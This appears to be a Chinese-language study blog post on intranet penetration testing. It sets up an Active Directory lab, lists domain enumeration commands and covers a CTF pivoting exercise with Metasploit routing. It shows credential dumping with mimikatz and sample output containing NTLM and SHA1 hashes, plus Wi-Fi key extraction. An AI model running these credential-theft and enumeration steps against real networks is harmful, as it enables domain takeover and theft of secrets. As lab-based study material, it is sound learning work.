admin 管理员组文章数量: 887021
内网
配置内网IP
配置域控
信息收集
网路域收集
ipconfig /all
会显示DNS后缀
systeminfo
net config workstation
net time /domain
net view /domain
net start 启动服务
tasklist 进程列表
nslookup 域名 追踪来源地址
用户收集
whoami /all 用户权限
net config workstation 登录信息
net user 本地用户
net localgroup 本地用户组
net localgroup administrators 获取本地管理员,包括域用户信息
net user /domain 获取域用户信息
net group /domain 获取域用户组信息
wmic useraccount get /all 涉及域用户详细信息
net group "Domain Admins" /domain 查询域管理员账户
net group "Enterprise Admins" /domain 查询管理员用户组
net group "Domain Controllers" /domain 查询域控制器
net group "Domain Users" /domain 查询域管理员账户
明文密码获取
明文获取-mimikatz(win),mimipenguin(linux)
privilege::debug
sekurlsa::logonpasswords full
2012之后抓不到明文密码
关于为何必须手动配置IP
固定ip的好处(局域网设置固定ip的好处)
云服务器存在的一个外网ip,这是IDC供应商提供的,这个外网IP包含域名解析,远程登录等。内网指的是局域网的IP,内网的计算机是利用NAT协议在公共网关访问的互联网。
内网IP和外网IP的区别在于外网IP是计算机唯一的IP地址,一个IP地址仅分配一个网络设备。内网IP是由路由器分配的内部的IP地址。每个人的内网IP地址不同是的互联网上的用户没办法直接访问内网。需要借助外网IP地址才能进行访问。
云服务器的内网IP在内网使用外网IP可通过互联网使用。云服务的内网IP的作用是什么呢?
有一个不同之处是,云服务器的内网IP在不同的局域网内是可以相同的,但是内网IP不能用于域名解析。内网IP也做不到直接用于云服务器远程登录,内网IP的主要作用与跟当前帐号下的其他同集群的机器完成通信。
现实生活中类似一些中小企业或者学校,他们都是仅仅申请一个固定的IP地址,然后通过IP共享,这样整个公司或学校的计算机都能访问到互联网。而云服务器内网IP指的是这些中小企业或学校的计算机使用的IP地址。
所以使用的云服务器会有内网IP呢?事实就是内网IP是在规划IPv4协议的时候,是出于考虑到IP地址资源可能不足的情况,就专门为内部网络设计的私有IP地址。
还有一点
局域网内要同属一段下的,如果同段IP资源不够,则需要通过自动分配还抢夺,或者仅仅为了图省事 另外,是否设定固定IP也与该局域网的设计有关 比如单位里,主管希望能够了解哪台机器固定由哪个人使用,那么使用固定IP,比较方便网管查看
添加服务 安装域控制器和添加DNS服务
直接安装即可
安装完域控制器之后,把该服务器升级为域控制器
配置域服务
密码:991206wxyWXY
提升完域控制器,变成了这样
加入域控
-
创建个域用户,方便另一台加入
本地域名---users----新建----用户
创建AD用户
密码:991206wxyWXY
域控制器( Domain controller,DC)是活动目录的存储位置,安装了活动目录的计算机称为域控制器。在第一次安装活动目录时,安装活动目录的那台计算机就成为域控制器,简称“域控”。域控制器存储着目录数据并管理用户域的交互关系,其中包括用户登录过程、身份验证和目录搜索等。
一个域可以有多个域控制器。为了获得高可用性和容错能力,规模较小的域只需两个域控制器,一个实际使用,另一个用于容错性检査;规模较大的域可以使用多个域控制器。
在对等网模式下,任何一台电脑只要接入网络,其他机器就都可以访问共享资源,如共享上网等。尽管对等网络上的共享文件可以加访问密码,但是非常容易被破解。在由Windows 9x构成的对等网中,数据的传输是非常不安全的。
不过在“域”模式下,至少有一台服务器负责每一台联入网络的电脑和用户的验证工作,相当于一个单位的门卫一样,称为“域控制器(Domain Controller,简写为DC)”。
域控制器中包含了由这个域的账户、密码、属于这个域的计算机等信息构成的数据库。当电脑联入网络时,域控制器首先要鉴别这台电脑是否是属于这个域的,用户使用的登录账号是否存在、密码是否正确。
如果以上信息有一样不正确,那么域控制器就会拒绝这个用户从这台电脑登录。不能登录,用户就不能访问服务器上有权限保护的资源,他只能以对等网用户的方式访问Windows共享出来的资源,这样就在一定程度上保护了网络上的资源。
要把一台电脑加入域,仅仅使它和服务器在网上邻居中能够相互“看”到是远远不够的,必须要由网络管理员进行相应的设置,把这台电脑加入到域中。这样才能实现文件的共享。
尝试把计算机加入域控
先设置IP地址
然后计算机-----设置-----
(此图是已经添加好的了,如果重新添加的话需要点击其他进行输入域的账号密码)
创建之后
----------------------------------------------------------------------------------------------------------------------
基本理论知识
#非军事区(DMZ)
---两个防火墙之间,为了解决安装防火墙后外部网络用户不能访问内部网络服务器的问题,而设立的一个非安全系统与 安全系统 之间的缓冲区。
---该缓冲区位于企业内部网络和外部网络之间的小网络区域内。放置一些必须公开的服务器设施,如企业Web服务器(攻击点)、FTP服务器 和论坛 等。
---有一些web服务器也放在内网,这样更加危险。
---另一方面,通过这样一个DMZ区域,更加有效地保护内部网络。因为这种网络部署,比起一般的防火墙方案,对来自外网的攻击者来说又多了一道关卡。
#工作组&域环境
---工作组:地位平等,管理分散,没有集中管理。(范围小的计算机在局域网内)
---域环境:地位不平等,管理集中,实现集中管理。(共享文件,不需要每台计算机去配置用户进行访问,可以直接访问)
---域环境也可以简单的理解为工作组的升级版,更好管理。
---这里我们把域环境和工作组区分开来是因为他们的攻击手段不同。
---工作组中的攻击手法如DNS劫持、ARP欺骗在域环境下是没有作用的。有一些攻击手段需要一些条件,这些条件在域环境下没有,相应的攻击手段就会失效。
#域控制器DC
---域控DC是这个域中的管理者,域里面的最高权限,判断是否拿下整个域,就是看你是否拿下这台域控制器(这里面dc就是域控制器)
讲一下内网的架构
WebServer两块网卡,一块对外一块对内,kali从对外的网卡入手攻击,拿下域控制器就是胜利
#AD活动目录
---是微软所提供的目录服务(查询,身份验证),活动目录的核心包含了活动目录数据库。
---在活动目录数据库中包含了域中所有的对象(用户,计算机,组…),活动目录(Active Directory)是面向Windows Standard Server、Windows Enterprise Server 以及Windows Datacenter Server的目录服务。
---Active Directory储存了有关网络对象的信息,并且让管理员和用户能够轻松的查找和使用这些信息。
#单域
---网络由主域管理器和任意数量的代理程序组成(公司都在一起,都在这个域内)
---可以将单域网络与其它网络(单域或多域)组合以满足多站点的需求,这是很重要的
#父域和子域
--总公司和分公司的关系,总公司可以管分公司
#域树和域森林
---域树由多个域组成,这些域共享同一表结构和配置,形成一个连续的名字空间。树中的域通过信任关系连接起来,活动目录包含一个或多个域树
---域林是指由一个或多个没有形成连续名字空间的域树组成,它与上面所讲的域树最明显的区别就在于这些域树之间没有形成连续的名字空间,而域树则是由一些具有连续名字空间的域组成。
#Linux域渗透问题
---AD域控制器只在windows server系统能做吗?Linux可以?
---linux上也有相应的活动目录的,不过要装LDAP环境,一般企很少会用LDAP来管理的,因为功能上不及域强大,而且用linux来管理的话要求技术人员门槛也比较高,个人认为Linux还是比较适合做服务器好一点。
---(就是说Linux上面的域环境需要环境支撑,而且功能没有windows上的域强大,所以大部分我们遇见的都是windows,这也是没有Linux的原因。当然,Linux这个操作系统也是可以加入域的,比如域内有Linux的操作系统,有Linux的服务器也行,只是很少)
#局域网技术适用问题
---不同的攻击技术手段适用面不同,这个我们要有所了解,比如arp欺骗适用于局域网,而不适用于域。
#内网安全流程
---熟悉基础概念-信息收集-后续探针-权限提升-横向渗透-权限维持
#环境介绍
---下图属于单域环境,Windows2008R2作为域控DC,有五个域成员主机(我开了三个)
---fileserver文件服务器、SqlServer数据库服务器、webserver网站服务器和两台个人PC(两台PC没开)。他们都是在192.168.3.0这个网段
---网站服务器有两个网卡,一个在3.31一个在230.131,这个230.133就好比是它的一个对外出口(外网接口)
---kali攻击机就好比攻击者,它通过230.131这个接口进入网站服务器计算机,由于这台计算机是处于内网连接(这里没有DMZ),所有它享有3这个网段的访问权限。
---拿下网站服务器后的首要攻击目标就是DC!只要拿下DC,也就相当于同时拿下了所有域成员主机权限。
---查看webserver的ip(分别登录administraotr和god\webadmin,发现他们的ip都是固定的,这样应该没有配置两个ip,只有配置了一个固定的ip)
1.信息收集 旨在了解当前服务器的计算机基本信息,为后续判断服务器角色,网络环境等做准备 判断是否存在域注意:ipconfig和ipconfig /all区别,加上all才能查看域
判断当前机器是否在域内
systeminfo 详细信息
判断当前用户是否为域用户
net config workstation
判断主域
net time /domain
三种情况都有,这是最好的情况
net start 启动服务 tasklist 进程列表 schtasks 计划任务目前无权限
网络信息收集操作演示
#旨在了解当前服务器的网络接口信息,为判断当前角色,功能,网络架构做准备
---ipconfig /all 判断存在域-最简单方式查看主DNS后缀
---和DNS域名解析一样,god为sqlserver. god的父域名
ipconfig /all 判断存在域-dns
典型的域环境
net view /domain 判断存在域 如果出现6118系统错误net time /domain 判断主域(主域就是域控的意思) ---是因为域成员计算机的时间一般会以域控制器为准,所以当执行net time /domain命令时,该计算机会去域控获取时间 ---此时返回的OWA2010CN-God.god就是域控的计算机全名。然后可以通过nslookup来最终确认域控IP netstat -ano 当前网络端口开放 nslookup 域名 追踪来源地址
域可以出现分层的情况
god
sqlserver.god
wxy.sqlserver.god
用户信息收集操作演示 旨在了解当前计算机或域环境下的用户及用户组信息,便于后期利用凭据进行测试 系统默认常见用户身份(我们主要攻击Domain Admains和Enterprise Admains,大部分成员主机在Domain users域用户里): Domain Admins :域管理员(默认对域控制器有完全控制权) Domain Computers :域内机器 Domain Controllers :域控制器 Domain Guest :域访客,权限低 Domain Users :域用户 Enterprise Admins :企业系统管理员用户(默认对域控制器有完全控制权) 相关用户收集操作命令: whoami /all 用户权限 net config workstation 登录信息 net user 本地用户 net localgroup 本地用户组net localgroup administrators 获取本地管理员,包括域用户信息
net user /domain 获取域用户信息 net group /domain 获取域用户组信息 wmic useraccount get /all 涉及域用户详细信息 net group "Domain Admins" /domain 查询域管理员账户 net group "Enterprise Admins" /domain 查询管理员用户组 net group "Domain Controllers" /domain 查询域控制器 ---net group "Domain Users" /domain 查询域管理员账户 凭据信息收集操作演示 旨在收集各种密文,明文,口令等,为后续横向渗透做好测试准备 计算机用户 HASH ,明文获取 -mimikatz(win),mimipenguin(linux) ---mimikatz下载:https://github/gentilkiwi/mimikatz/releases 计算机各种协议服务口令获取 -LaZagne(all) , XenArmor(win) Netsh WLAN show profiles Netsh WLAN show profile name=" 无线名称 " key=clear 1. 站点源码备份文件、数据库备份文件等 2. 各类数据库 Web 管理入口,如 PHPMyAdmin 3. 浏览器保存密码、浏览器 Cookies 4. 其他用户会话、 3389 和 ipc$ 连接记录、回收站内容 5.Windows 保存的 WIFI 密码 6. 网络内部的各种帐号和密码,如: Email 、 VPN 、 FTP 、 OA 等 mimikaz的使用 首先用管理员权限打开猕猴桃标志的EXE,然后输入:privilege::debug
sekurlsa::logonpasswords full测试权限
sekurlsa::logonpasswords full
一般在2012之后的版本抓取不到明文密码
win2008
win2016
mimikatz # sekurlsa::logonpasswords full
Authentication Id : 0 ; 264142 (00000000:000407ce)
Session : Interactive from 1
User Name : Administrator
Domain : WXY
Logon Server : WIN-1C9KV933DAT
Logon Time : 2022/12/23 16:17:32
SID : S-1-5-21-1503885104-1327830933-3999420510-500
msv :
[00000005] Primary
* Username : Administrator
* Domain : WXY
* NTLM : 5cd80c2875b2f886b2321d620dd6f00f
* SHA1 : 7494906fb021dc66ec31542e58c0deb92d84b338
* DPAPI : b2243ab7627b048217481a7f209c95aa
tspkg :
wdigest :
* Username : Administrator
* Domain : WXY
* Password : (null)
kerberos :
* Username : Administrator
* Domain : WXY.COM
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 63788 (00000000:0000f92c)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 2022/12/23 16:16:39
SID : S-1-5-90-0-1
msv :
[00000005] Primary
* Username : WIN-1C9KV933DAT$
* Domain : WXY
* NTLM : c762c5d8f932cf19755bd258b9f339fb
* SHA1 : d54abf84ea370ddee3c2f88b158bf02778c44387
tspkg :
wdigest :
* Username : WIN-1C9KV933DAT$
* Domain : WXY
* Password : (null)
kerberos :
* Username : WIN-1C9KV933DAT$
* Domain : wxy
* Password : 41 0f ad 39 b2 3e 5d 33 14 6c 4f a1 01 8c 8f a4 31 d0 b9 ba 6a 53 c2 65 5c 44 c4 9c 96 9d d0 96 a6 e7 23 cc 27 2d 0d 51 16 78 b2 8a b7 d3 7b 30 d8 e1 14 4a fd 89 40 24 75 6f ca db 5b 37 d6 72 fe 1c d0 5f cd cd c2 14 ed ee 92 3b 23 df a0 aa a7 49 77 98 05 d6 0a 9b 13 29 64 5d 9e 2b 0d 31 ad 07 96 98 40 03 67 67 d8 cd 50 c2 b5 bc 14 95 64 bb 9b ac 21 57 87 05 d1 01 4d 86 71 70 c7 2c c9 4c a2 47 80 47 18 2f 68 65 fc 25 35 ca 91 79 48 06 c9 59 03 00 87 f6 80 1a 4a e0 51 a2 ec 05 04 87 15 be 93 6e ec f7 20 84 e1 a4 b9 8c 35 ea 98 19 0b 41 e7 06 12 a3 44 97 2a c1 3a 62 7e 51 69 b7 46 21 a3 1c b9 2e b2 43 2d 8c 1f 8f 04 23 43 8d 92 05 83 41 b5 26 49 a2 c9 2c 48 8d 91 56 5a 9c ff 53 24 c5 64 21 4f db 08 6d 84 a7 35 25
ssp :
credman :
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : WIN-1C9KV933DAT$
Domain : WXY
Logon Server : (null)
Logon Time : 2022/12/23 16:16:39
SID : S-1-5-20
msv :
[00000005] Primary
* Username : WIN-1C9KV933DAT$
* Domain : WXY
* NTLM : c762c5d8f932cf19755bd258b9f339fb
* SHA1 : d54abf84ea370ddee3c2f88b158bf02778c44387
tspkg :
wdigest :
* Username : WIN-1C9KV933DAT$
* Domain : WXY
* Password : (null)
kerberos :
* Username : win-1c9kv933dat$
* Domain : WXY.COM
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 995 (00000000:000003e3)
Session : Service from 0
User Name : IUSR
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2022/12/23 16:17:05
SID : S-1-5-17
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
ssp :
credman :
Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2022/12/23 16:16:39
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 63128 (00000000:0000f698)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 2022/12/23 16:16:39
SID : S-1-5-90-0-1
msv :
[00000005] Primary
* Username : WIN-1C9KV933DAT$
* Domain : WXY
* NTLM : c762c5d8f932cf19755bd258b9f339fb
* SHA1 : d54abf84ea370ddee3c2f88b158bf02778c44387
tspkg :
wdigest :
* Username : WIN-1C9KV933DAT$
* Domain : WXY
* Password : (null)
kerberos :
* Username : WIN-1C9KV933DAT$
* Domain : wxy
* Password : 41 0f ad 39 b2 3e 5d 33 14 6c 4f a1 01 8c 8f a4 31 d0 b9 ba 6a 53 c2 65 5c 44 c4 9c 96 9d d0 96 a6 e7 23 cc 27 2d 0d 51 16 78 b2 8a b7 d3 7b 30 d8 e1 14 4a fd 89 40 24 75 6f ca db 5b 37 d6 72 fe 1c d0 5f cd cd c2 14 ed ee 92 3b 23 df a0 aa a7 49 77 98 05 d6 0a 9b 13 29 64 5d 9e 2b 0d 31 ad 07 96 98 40 03 67 67 d8 cd 50 c2 b5 bc 14 95 64 bb 9b ac 21 57 87 05 d1 01 4d 86 71 70 c7 2c c9 4c a2 47 80 47 18 2f 68 65 fc 25 35 ca 91 79 48 06 c9 59 03 00 87 f6 80 1a 4a e0 51 a2 ec 05 04 87 15 be 93 6e ec f7 20 84 e1 a4 b9 8c 35 ea 98 19 0b 41 e7 06 12 a3 44 97 2a c1 3a 62 7e 51 69 b7 46 21 a3 1c b9 2e b2 43 2d 8c 1f 8f 04 23 43 8d 92 05 83 41 b5 26 49 a2 c9 2c 48 8d 91 56 5a 9c ff 53 24 c5 64 21 4f db 08 6d 84 a7 35 25
ssp :
credman :
Authentication Id : 0 ; 39693 (00000000:00009b0d)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 2022/12/23 16:16:38
SID :
msv :
[00000005] Primary
* Username : WIN-1C9KV933DAT$
* Domain : WXY
* NTLM : c762c5d8f932cf19755bd258b9f339fb
* SHA1 : d54abf84ea370ddee3c2f88b158bf02778c44387
tspkg :
wdigest :
kerberos :
ssp :
credman :
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : WIN-1C9KV933DAT$
Domain : WXY
Logon Server : (null)
Logon Time : 2022/12/23 16:16:38
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : WIN-1C9KV933DAT$
* Domain : WXY
* Password : (null)
kerberos :
* Username : win-1c9kv933dat$
* Domain : WXY.COM
* Password : (null)
ssp :
credman :
从上面结果可以看出:
1、一个Authentication Id代表一个块结果(这个“块结果”我自己理解的),也就是内存里面某个账户里面的凭证。
2、msv项是账号对应的密码的各种加密协议的密文。
3、tspkg、wdigest、kerberos 这3个项是账号对应的明文密码,但有时候不是3个项都得到结果的。
4、ssp项下是你最新登录到其他RDP终端所用到账号密码,windows server 2003、windows xp是不会记录到这里的,因为账号密码的输入不在本机内存里。
5、domain项是被登陆的机器的USERDOMAIN,可通过set命令来查看该变量,通过ping该项对应的值,可得到目标的IP。如:ping -n 1 john-PC,如果想要是IPv4就加上-4参数,即:ping -n 1 -4 john-PC
-----------------------------------------------------------------------------------------------------------------
CFS三层内网漫游安全测试演练-某CTF线下2019
来源:2019某CTF线下赛真题内网结合WEB攻防题库,涉及WEB攻击,内网代理路由等技术,每台服务器存在一个Flag,获取每一个Flag对应一个积分,获取三个Flag结束。
Targert1两块网卡
76段是外网,22段是内网
Targert2两块网卡
22段是内网,33段是内网
Targer3一块网卡
33段内网
---这里三台靶机通过共同占据一个网段来进行通信(target1和target3不在一个网段不能通信,需要逐层渗透)
--- kali能ping通target1 ,target1能ping通target2 , target2能ping通target3 三层网络关系
---在没有外网的环境下,kail要攻破target3,只能先拿下target1 ,在通过target1拿下target2,最后拿下target3
-------------------------------------------------------------------------------------------------------------------------------
论后渗透MSF之 | 添加路由和代理
一、基本概念
内网中添加路由主要是充当跳板功能, 其实是MSF框架中自带的一个路由转发功能,其实现过程就是MSF框架在已经获取的meterpreter shell的基础上添加一条去往内网的路由,此路由的下一跳转发,即网关,是MSF攻击平台与被攻击目标建立的一个session会话
通过msf添加路由功能,可以直接使用msf去访问原本不能直接访问的内网资源,只要路由可达了,那么我们使用msf的强大功能,想干什么就干什么了
CFS内网渗透三层内网漫游靶场-2019某CTF案例_Ranwu0的博客-CSDN博客_cfs靶场
msf添加路由及socks5代理_山山而川'的博客-CSDN博客_msf添加路由
论后渗透MSF之 | 添加路由和代理_msf添加路由_迷途羔羊pro的博客-CSDN博客
msf之添加内网路由 - 走看看
本文标签: 内网
版权声明:本文标题:内网安全学习 内容由网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:http://www.freenas.com.cn/jishu/1726802990h1031284.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论